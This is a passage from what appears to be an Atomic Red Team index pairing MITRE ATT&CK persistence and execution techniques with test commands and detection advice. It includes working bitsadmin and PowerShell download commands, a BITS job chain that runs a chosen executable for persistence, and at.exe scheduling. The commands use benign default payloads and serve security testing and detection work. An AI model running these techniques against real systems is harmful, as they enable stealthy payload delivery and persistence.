"AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011" - cleanup_command: | - Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore - Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore - name: powershell - elevation_required: true - T1053.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1053.001 - url: https://attack.mitre.org/techniques/T1053/001 - - source_name: Kifarunix - Task Scheduling in Linux - url: https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/ - description: Koromicha. (2019, September 7). Scheduling tasks using at command - in Linux. Retrieved December 3, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: At (Linux) - description: |- - Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux) - - An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account. - id: attack-pattern--6636bc83-0611-45a6-b74f-1f3daf635b8e - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-23T22:35:13.112Z' - created: '2019-12-03T12:59:36.749Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_remote_support: true - x_mitre_detection: "Monitor scheduled task creation using command-line invocation. - Legitimate scheduled tasks may be created during installation of new software - or through system administration functions. Look for changes to tasks that - do not correlate with known software, patch cycles, etc. \n\nSuspicious program - execution through scheduled tasks may show up as outlier processes that have - not been seen before when compared against historical data. Data and events - should not be viewed in isolation, but as part of a chain of behavior that - could lead to other activities, such as network connections made for Command - and Control, learning details about the environment through Discovery, and - Lateral Movement." - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - x_mitre_platforms: - - Linux - identifier: T1053.001 - atomic_tests: - - name: At - Schedule a job - auto_generated_guid: 7266d898-ac82-4ec0-97c7-436075d0d08e - description: 'This test submits a command to be run in the future by the `at` - daemon. - -' - supported_platforms: - - linux - input_arguments: - time_spec: - description: Time specification of when the command should run - type: String - default: now + 1 minute - at_command: - description: The command to be run - type: String - default: echo Hello from Atomic Red Team - dependency_executor_name: sh - dependencies: - - description: 'The `at` and `atd` executables must exist in the PATH - -' - prereq_command: 'which at && which atd - -' - get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found - in the PATH (Package name: `at`)'' - -' - - description: 'The `atd` daemon must be running - -' - prereq_command: 'systemctl status atd || service atd status - -' - get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service - atd start` ; systemd: `systemctl start atd`)'' - -' - executor: - name: sh - elevation_required: false - command: 'echo "#{at_command}" | at #{time_spec} - -' - T1053.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1053.002 - url: https://attack.mitre.org/techniques/T1053/002 - - url: https://twitter.com/leoloobeek/status/939248813465853953 - description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved - December 12, 2017. - source_name: Twitter Leoloobeek Scheduled Task - - url: https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen - description: Satyajit321. (2015, November 3). Scheduled Tasks History Retention - settings. Retrieved December 12, 2017. - source_name: TechNet Forum Scheduled Task Operational Setting - - url: https://technet.microsoft.com/library/dd315590.aspx - description: Microsoft. (n.d.). General Task Registration. Retrieved December - 12, 2017. - source_name: TechNet Scheduled Task Events - - source_name: Microsoft Scheduled Task Events Win10 - url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events - description: Microsoft. (2017, May 28). Audit Other Object Access Events. - Retrieved June 27, 2019. - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: At (Windows) - description: "Adversaries may abuse the at.exe utility to perform - task scheduling for initial or recurring execution of malicious code. The - [at](https://attack.mitre.org/software/S0110) utility exists as an executable - within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) - requires that the Task Scheduler service be running, and the user to be logged - on as a member of the local Administrators group. \n\nAn adversary may use - at.exe in Windows environments to execute programs at system - startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) - can also be abused to conduct remote Execution as part of Lateral Movement - and or to run a process under the context of a specified account (such as - SYSTEM).\n\nNote: The at.exe command line utility has been deprecated - in current versions of Windows in favor of schtasks." - id: attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T13:43:40.776Z' - created: '2019-11-27T13:52:45.853Z' - x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring - - Windows event logs - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_remote_support: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: |- - Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. - - Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10) - - * Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered - * Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated - * Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted - * Event ID 4698 on Windows 10, Server 2016 - Scheduled task created - * Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled - * Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled - - Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) - - Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. - x_mitre_platforms: - - Windows - identifier: T1053.002 - atomic_tests: - - name: At.exe Scheduled task - auto_generated_guid: 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 - description: | - Executes cmd.exe - Note: deprecated in Windows 8+ - - Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time. - supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: false - command: 'at 13:20 /interactive cmd - -' - T1547.002: - technique: - id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec - description: |- - Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages) - - Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded. - name: Authentication Package - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547.002 - url: https://attack.mitre.org/techniques/T1547/002 - - url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx - description: Microsoft. (n.d.). Authentication Packages. Retrieved March 1, - 2017. - source_name: MSDN Authentication Packages - - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html - description: Graeber, M. (2014, October). Analysis of Malicious Security Support - Provider DLLs. Retrieved March 1, 2017. - source_name: Graeber 2014 - - url: https://technet.microsoft.com/en-us/library/dn408187.aspx - description: Microsoft. (2013, July 31). Configuring Additional LSA Protection. - Retrieved June 24, 2015. - source_name: Microsoft Configure LSA - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-25T15:11:25.821Z' - created: '2020-01-24T14:54:42.757Z' - x_mitre_platforms: - - Windows - x_mitre_data_sources: - - DLL monitoring - - Windows Registry - - Loaded DLLs - x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys. - Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 - R2 may generate events when unsigned DLLs try to load into the LSA by setting - the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber - 2014) (Citation: Microsoft Configure LSA)' - x_mitre_permissions_required: - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - atomic_tests: [] - T1197: - technique: - id: attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: BITS Jobs - description: |- - Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM). (Citation: Microsoft COM) (Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. - - The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft BITS) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool. (Citation: Microsoft BITSAdmin) - - Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls. (Citation: CTU BITS Malware June 2016) (Citation: Mondok Windows PiggyBack BITS May 2007) (Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots). (Citation: PaloAlto UBoatRAT Nov 2017) (Citation: CTU BITS Malware June 2016) - - BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). (Citation: CTU BITS Malware June 2016) - external_references: - - source_name: mitre-attack - external_id: T1197 - url: https://attack.mitre.org/techniques/T1197 - - url: https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx - description: Microsoft. (n.d.). Component Object Model (COM). Retrieved November - 22, 2017. - source_name: Microsoft COM - - url: https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx - description: Microsoft. (n.d.). Background Intelligent Transfer Service. Retrieved - January 12, 2018. - source_name: Microsoft BITS - - url: https://msdn.microsoft.com/library/aa362813.aspx - description: Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018. - source_name: Microsoft BITSAdmin - - url: https://www.secureworks.com/blog/malware-lingers-with-bits - description: Counter Threat Unit Research Team. (2016, June 6). Malware Lingers - with BITS. Retrieved January 12, 2018. - source_name: CTU BITS Malware June 2016 - - url: https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/ - description: Mondok, M. (2007, May 11). Malware piggybacks on Windows’ Background - Intelligent Transfer Service. Retrieved January 12, 2018. - source_name: Mondok Windows PiggyBack BITS May 2007 - - url: https://www.symantec.com/connect/blogs/malware-update-windows-update - description: Florio, E. (2007, May 9). Malware Update with Windows Update. - Retrieved January 12, 2018. - source_name: Symantec BITS May 2007 - - url: https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/ - description: Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. - Retrieved January 12, 2018. - source_name: PaloAlto UBoatRAT Nov 2017 - - url: https://technet.microsoft.com/library/dd939934.aspx - description: Microsoft. (2011, July 19). Issues with BITS. Retrieved January - 12, 2018. - source_name: Microsoft Issues with BITS July 2011 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-25T23:28:10.049Z' - created: '2018-04-18T17:59:24.739Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Windows - x_mitre_permissions_required: - - User - - Administrator - - SYSTEM - x_mitre_detection: |- - BITS runs as a service and its status can be checked with the Sc query utility (sc query bits). (Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (bitsadmin /list /allusers /verbose). (Citation: Microsoft BITS) - - Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options) (Citation: Microsoft BITS)Admin and the Windows Event log for BITS activity. Also consider investigating more detailed information about jobs by parsing the BITS job database. (Citation: CTU BITS Malware June 2016) - - Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account). (Citation: Microsoft BITS) - x_mitre_defense_bypassed: - - Firewall - - Host forensic analysis - x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - Packet capture - - Windows event logs - x_mitre_contributors: - - Ricardo Dias - - Red Canary - x_mitre_version: '1.1' - identifier: T1197 - atomic_tests: - - name: Bitsadmin Download (cmd) - auto_generated_guid: 3c73d728-75fb-4180-a12f-6712864d7421 - description: | - This test simulates an adversary leveraging bitsadmin.exe to download - and execute a payload - supported_platforms: - - windows - input_arguments: - remote_file: - description: Remote file to download - type: url - default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md - local_file: - description: Local file path to save downloaded file - type: path - default: "%temp%\\bitsadmin1_flag.ps1" - executor: - command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} - #{local_file} - -' - cleanup_command: 'del #{local_file} >nul 2>&1 - -' - name: command_prompt - - name: Bitsadmin Download (PowerShell) - auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc - description: | - This test simulates an adversary leveraging bitsadmin.exe to download - and execute a payload leveraging PowerShell - - Upon execution you will find a github markdown file downloaded to the Temp directory - supported_platforms: - - windows - input_arguments: - remote_file: - description: Remote file to download - type: url - default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md - local_file: - description: Local file path to save downloaded file - type: path - default: "$env:TEMP\\bitsadmin2_flag.ps1" - executor: - command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination - #{local_file} - -' - cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore - -' - name: powershell - - name: Persist, Download, & Execute - auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae - description: | - This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps. - Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsdamin to run an executable. - This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS" - This job will remain in the BITS queue until complete or for up to 90 days by default if not removed. - supported_platforms: - - windows - input_arguments: - command_path: - description: Path of command to execute - type: path - default: C:\Windows\system32\notepad.exe - bits_job_name: - description: Name of BITS job - type: string - default: AtomicBITS - local_file: - description: Local file path to save downloaded file - type: path - default: "%temp%\\bitsadmin3_flag.ps1" - remote_file: - description: Remote file to download - type: url - default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md - executor: - command: | - bitsadmin.exe /create #{bits_job_name} - bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file} - bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} "" - bitsadmin.exe /resume #{bits_job_name} - timeout 5 - bitsadmin.exe /complete #{bits_job_name} - cleanup_command: 'del #{local_file} >nul 2>&1 - -' - name: command_prompt - - name: Bits download using desktopimgdownldr.exe (cmd) - auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 - description: "This test simulates using desktopimgdownldr.exe to download a - malicious file\ninstead of a desktop or lockscreen background img. The process - that actually makes \nthe TCP connection and creates the file on the disk - is a svchost process (“-k netsvc -p -s BITS”) \nand not desktopimgdownldr.exe. - See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\n" - supported_platforms: - - windows - input_arguments: - remote_file: - description: Remote file to download - type: url - default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md - download_path: - description: Local file path to save downloaded file - type: path - default: SYSTEMROOT=C:\Windows\Temp - cleanup_path: - description: path to delete file as part of cleanup_command - type: path - default: C:\Windows\Temp\Personalization\LockScreenImage - cleanup_file: - description: file to remove as part of cleanup_command - type: string - default: "*.md" - executor: - command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} - /eventName:desktopimgdownldr - -' - cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >null 2>&1 - -' - name: command_prompt - T1547: - technique: - id: attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf - description: |- - Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. - - Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges. - name: Boot or Logon Autostart Execution - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547 - url: https://attack.mitre.org/techniques/T1547 - - external_id: CAPEC-564 - source_name: capec - url: https://capec.mitre.org/data/definitions/564.html - - url: http://msdn.microsoft.com/en-us/library/aa376977 - description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November - 12, 2014. - source_name: Microsoft Run Key - - url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx - description: Microsoft. (n.d.). Authentication Packages. Retrieved March 1, - 2017. - source_name: MSDN Authentication Packages - - url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx - description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018. - source_name: Microsoft TimeProvider - - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order - description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence, - Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.' - source_name: Cylance Reg Persistence Sept 2013 - - source_name: Linux Kernel Programming - url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf - description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel - Module Programming Guide. Retrieved April 6, 2018. - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-10-09T16:05:36.772Z' - created: '2020-01-23T17:46:59.535Z' - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_detection: "Monitor for additions or modifications of mechanisms that - could be used to trigger autostart execution, such as relevant additions to - the Registry. Look for changes that are not correlated with known updates, - patches, or other planned administrative activity. Tools such as Sysinternals - Autoruns may also be used to detect system autostart configuration changes - that could be attempts at persistence.(Citation: TechNet Autoruns) Changes - to some autostart configuration settings may happen under normal conditions - when legitimate software is installed. \n\nSuspicious program execution as - autostart programs may show up as outlier processes that have not been seen - before when compared against historical data.To increase confidence of malicious - activity, data and events should not be viewed in isolation, but as part of - a chain of behavior that could lead to other activities, such as network connections - made for Command and Control, learning details about the environment through - Discovery, and Lateral Movement.\n\nMonitor DLL loads by processes, specifically - looking for DLLs that are not recognized or not normally loaded into a process. - Look for abnormal process behavior that may be due to a process loading a - malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line - parameters involved in kernel modification or driver installation." - x_mitre_permissions_required: - - User - - Administrator - - root - x_mitre_is_subtechnique: false - x_mitre_version: '1.1' - atomic_tests: [] - T1037: - technique: - id: attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Boot or Logon Initialization Scripts - description: "Adversaries may use scripts automatically executed at boot or - logon initialization to establish persistence. Initialization scripts can - be used to perform administrative functions, which may often execute other - programs or send information to an internal logging server. These scripts - can vary based on operating system and whether applied locally or remotely. - \ \n\nAdversaries may use these scripts to maintain persistence on a single - system. Depending on the access configuration of the logon scripts, either - local credentials or an administrator account may be necessary. \n\nAn adversary - may also be able to escalate their privileges since some boot or logon initialization - scripts run with higher privileges." - external_references: - - source_name: mitre-attack - external_id: T1037 - url: https://attack.mitre.org/techniques/T1037 - - external_id: CAPEC-564 - source_name: capec - url: https://capec.mitre.org/data/definitions/564.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-08-03T16:47:37.240Z' - created: '2017-05-31T21:30:38.910Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - macOS - - Windows - - Linux - x_mitre_detection: Monitor logon scripts for unusual access by abnormal users - or at abnormal times. Look for files added or modified by unusual accounts - outside of normal administration duties. Monitor running process for actions - that could be indicative of abnormal programs or executables running upon - logon. - x_mitre_data_sources: - - File monitoring - - Process monitoring - x_mitre_version: '2.1' - atomic_tests: [] - T1542.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1542.003 - url: https://attack.mitre.org/techniques/T1542/003 - - external_id: CAPEC-552 - source_name: capec - url: https://capec.mitre.org/data/definitions/552.html - - source_name: Mandiant M Trends 2016 - url: https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf - description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved - March 5, 2019. - - url: http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion - description: Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? - (Infographic). Retrieved November 13, 2014. - source_name: Lau 2011 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Bootkit - description: |- - Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly. - - A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011) - - The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code. - id: attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-17T19:47:14.338Z' - created: '2019-12-19T21:05:38.123Z' - x_mitre_defense_bypassed: - - Host intrusion prevention systems - - Anti-virus - - File monitoring - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: Perform integrity checking on MBR and VBR. Take snapshots - of MBR and VBR and compare against known good samples. Report changes to MBR - and VBR as they occur for indicators of suspicious activity and further analysis. - x_mitre_data_sources: - - VBR - - MBR - - API monitoring - x_mitre_platforms: - - Linux - - Windows - atomic_tests: [] - T1176: - technique: - id: attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Browser Extensions - description: |- - Adversaries may abuse Internet browser extensions to establish persistence access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access. (Citation: Wikipedia Browser Extension) (Citation: Chrome Extensions Definition) - - Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners. (Citation: Malicious Chrome Extension Numbers) Once the extension is installed, it can browse to websites in the background, (Citation: Chrome Extension Crypto Miner) (Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials) (Citation: Banker Google Chrome Extension Steals Creds) (Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence. - - There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions. (Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control (Citation: Chrome Extension C2 Malware). - external_references: - - source_name: mitre-attack - external_id: T1176 - url: https://attack.mitre.org/techniques/T1176 - - url: https://en.wikipedia.org/wiki/Browser_extension - description: Wikipedia. (2017, October 8). Browser Extension. Retrieved January - 11, 2018. - source_name: Wikipedia Browser Extension - - url: https://developer.chrome.com/extensions - description: Chrome. (n.d.). What are Extensions?. Retrieved November 16, - 2017. - source_name: Chrome Extensions Definition - - url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf - description: Jagpal, N., et al. (2015, August). Trends and Lessons from Three - Years Fighting Malicious Extensions. Retrieved November 17, 2017. - source_name: Malicious Chrome Extension Numbers - - url: https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/ - description: Brinkmann, M. (2017, September 19). First Chrome extension with - JavaScript Crypto Miner detected. Retrieved November 16, 2017. - source_name: Chrome Extension Crypto Miner - - url: https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses - description: De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME - EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL - BUSINESSES. Retrieved January 17, 2018. - source_name: ICEBRG Chrome Extensions - - url: https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/ - description: Marinho, R. (n.d.). (Banker(GoogleChromeExtension)).targeting. - Retrieved November 18, 2017. - source_name: Banker Google Chrome Extension Steals Creds - - url: https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/) - description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension - Steals All Posted Data. Retrieved November 16, 2017. - source_name: Catch All Chrome Extension - - url: https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/ - description: 'Vachon, F., Faou, M. (2017, July 20). Stantinko: A massive adware - campaign operating covertly since 2012. Retrieved November 16, 2017.' - source_name: Stantinko Botnet - - url: https://kjaer.io/extension-malware/ - description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might - get hacked by a Chrome extension. Retrieved November 22, 2017.' - source_name: Chrome Extension C2 Malware - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-25T23:36:30.565Z' - created: '2018-01-16T16:13:52.465Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_permissions_required: - - User - x_mitre_detection: |- - Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a 